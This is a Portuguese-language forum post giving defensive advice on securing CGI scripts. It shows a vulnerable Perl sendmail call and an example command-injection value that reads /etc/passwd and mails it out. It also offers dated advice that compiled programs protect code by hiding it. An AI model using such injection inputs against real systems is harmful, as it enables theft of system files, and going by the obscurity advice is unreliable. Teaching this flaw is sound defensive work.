Bem vindo ao PROJECT-HTML
Aprenda mais sobre:
HTML, CSS, JavaScript, webmaster, Imagens, banners, wallpapers, videos aula, windows, utilitários para site/blogs, Jogos, animes e muito mais.
Basta se registrar!



 
InícioProject HTMLGaleriaFAQRegistrar-seConectar-se
Buscar
 
 

Resultados por:
 
Rechercher Busca avançada
Conectar-se
Nome de usuário:
Senha:
Conexão automática: 
:: Esqueci minha senha
Votação
Qual seu navegador favorito?
 FireFox
 Chrome
 Internet Explorer
 safari
 Netscape
 Opera
 Avant
Exibir resultados
Quem está conectado
1 usuário online :: Nenhum usuário registrado, Nenhum Invisível e 1 Visitante

Nenhum

O recorde de usuários online foi de 36 em 3/4/2016, 3:36 am
Últimos assuntos
» TAG´s (comandos)
4/8/2014, 10:15 am por robson

» Comandos básico de HTML - body (corpo da home page)
16/7/2014, 10:10 am por robson

» Apresentações aqui
15/7/2014, 4:14 pm por robson

» Como colocar "posts recomendados" no sou blog sou site.
24/3/2014, 8:05 pm por Otome

» Arquivo de ajuda sobre PHP, help para iniciantes e experientes
24/3/2014, 8:03 pm por Otome

» Imagens Exercício-6
22/3/2014, 5:19 pm por SY64

» Alinhamento de imagens
22/3/2014, 4:43 pm por SY64

» Link´s Exercicios-5
22/3/2014, 12:43 pm por SY64

» Criar um site passo a passo
1/8/2013, 4:41 pm por marlonsouzajs


Compartilhe | 
 

 Segurança nos CGI’s

Ver o tópico anterior Ver o tópico seguinte Ir em baixo 
AutorMensagem
Diego
Admin
Admin
avatar

Masculino
Número de Mensagens : 321
Idade : 25
Localização : Aqui no PROJECT-HTML
Pontos : 5438
Reputação : 24
Data de inscrição : 04/07/2008

MensagemAssunto: Segurança nos CGI’s   29/11/2008, 1:27 am

O CGI (Common Gateway Interface) hoje em dia é uma das mais usadas ferramentas para acesso a
dados e execução de praticamente qualquer tipo de serviço. Pela sua própria natureza, o CGI gera brechas de
segurança que podem causar grandes estragos na máquina onde o servidor www está instalado.

De maneira geral o CGI é feito para executar algum processamento, que normalmente o necessita de
dados (parâmetros) para funcionar. Esses dados, no ambiente www, são adquiridos via formulário. O cuidado
com as informações recebidas é um dos pontos iniciais para se prevenir sobre a questão segurança no
servidor.

Nunca subestime o tempo que um hacker vai usar para tentar entrar no seu servidor. Para ele, isto é
uma forma de jogo; eles estão tentando provar a eles mesmos e a você que eles na verdade são mais espertos
que você. A maioria deles vai tentar obter acesso à conta mais privilegiada que seu sistema possui, e
normalmente fará isso via rede. Administradores preguiçosos e programas mal escritos podem dar a um
hacker exatamente o que ele precisa para isso.

Muitos programas cgi são vulneráveis, especialmente aqueles que estão liberados na Internet, uma
vez que todos tiveram tempo de analisá-lo e explorar suas eventuais falhas. Muitos desses programas são
considerados perigosos há mais de 1 ano, e mesmo assim encontram-se vários servidores ainda funcionando
com esses produtos (como o phf.cgi, que era distribuído junto com os servidores Apache desde janeiro de
1996). Até mesmo o programa count.cgi, o mais comum programa para incluir contadores numa página teve
um bug reportado no começo do ano.

Como medidas básicas para proteger seus scripts desses ataques, o primeiro conselho é NUNCA
executar seu servidor www com um usuário privilegiado. Muitos administradores não querem perder tempo
resolvendo problemas de permissões, então eles resolvem “simplificar” as coisas executando seu httpd com
permissão do administrador. Isso claramente compromete a segurança, uma vez que os scripts e os cgi’s são
executados com o privilégio do usuário sob o qual o servidor é executado.

O próximo passo é se livrar de todos os scripts que vieram de exemplo com o servidor, ou aqueles
que você não utiliza. Esses produtos, se ficarem “perdidos” no seu servidor, podem virar uma porta de entrada
para intrusos depois de bem estudados por eles.

É interessante que apenas o usuário responsável (ou o Webmaster) tenha acesso ao diretório de
scripts, para evitar que algum usuário não autorizado coloque algum programa e o execute. Lembre-se que um
hacker não ataca necessariamente pela rede, e muitas empresas tem prejuízos com ataques vindos de seus
próprios empregados. O usuário habilitado para colocar os programas deve examinar cuidadosamente o
código do programa, testá-lo de todas as maneiras possíveis e verificar suas permissões de execução. O
desenvolvedor deve tomar cuidado o uso com caracteres que tem significado especial para o sistema
operacional, como os |, >, <, ;, etc.

Procure incorporar ao programa uma rotina de consistência inicial que permita ao usuário apenas
enviar caracteres permitidos (como os do conjunto entre A a Z e entre 0 a 9).

Uma das maneiras mais seguras de proteger seus programas do estudo de outras pessoas é usar
apenas programas compilados, que não permitem acesso ao código fonte. Isso torna mais difícil alguém
estudar seu programa e descobrir suas eventuais falhas. Um programa C compilado oferece menos perigo do
que um programa Perl, que é interpretado.

Chamadas diretas ao sistema, ou a execução de aplicativos sem tratamento pode fornecer material
para invasores. Por exemplo, um programa em Perl que envia mail:

...
open MAIL, “| /usr/lib/sendmail $destino”
|| die “Cant open pipe: $!\n”;
...

Se um hacker enviar pelo formulário a linha abaixo, que fosse atribuída à variável $destino:
“; cat /etc/passwd | mail [Você precisa estar registrado e conectado para ver este link.]
Um modo de evitar esse tipo de abordagem é evitar que o comando leia os parâmetros diretamente,
ou filtrar a entrada, para evitar ler o caracter ;.

_________________
Quem pode faz, não copia!
[Você precisa estar registrado e conectado para ver esta imagem.]
s2 Diego e Barbara s2
Informações do meu PC:
Processador:Intel Core i5 760 @ 2.80GHz 8Mb cache
Placa mãe: ASUSTeK Computer INC. P7P55D-Deluxe
Memoria Ram: 4.0GB Único -Channel DDR3 @ 668MHz * 2 = 1333Mhz (9-9-9-24)
Placa de video: 512 MB GeForce 8400 GS (XFX Pine Group)
HD: 160GB SAMSUNG SAMSUNG HD161HJ (SATA)
Audio: SoundMAX Integrated Digital Audio
Sistema operativo: MS Windows 7 Ultimate 64-bit
Voltar ao Topo Ir em baixo
Ver perfil do usuário http://www.projecthtml.tk
 
Segurança nos CGI’s
Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo 
Página 1 de 1
 Tópicos similares
-
» Câmera de Segurança flagra... Alguma coisa na Indonésia
» Logs de segurança
» [Resolvido] Código de segurança no registro
» JOGOS A VENDA NO MERCADO LIVRE - SEGURANÇA NA COMPRA
» Aumentar a segurança do meu fórum

Permissão deste fórum:Você não pode responder aos tópicos neste fórum
 :: Webmaster :: O papel do Webmaster-
Ir para: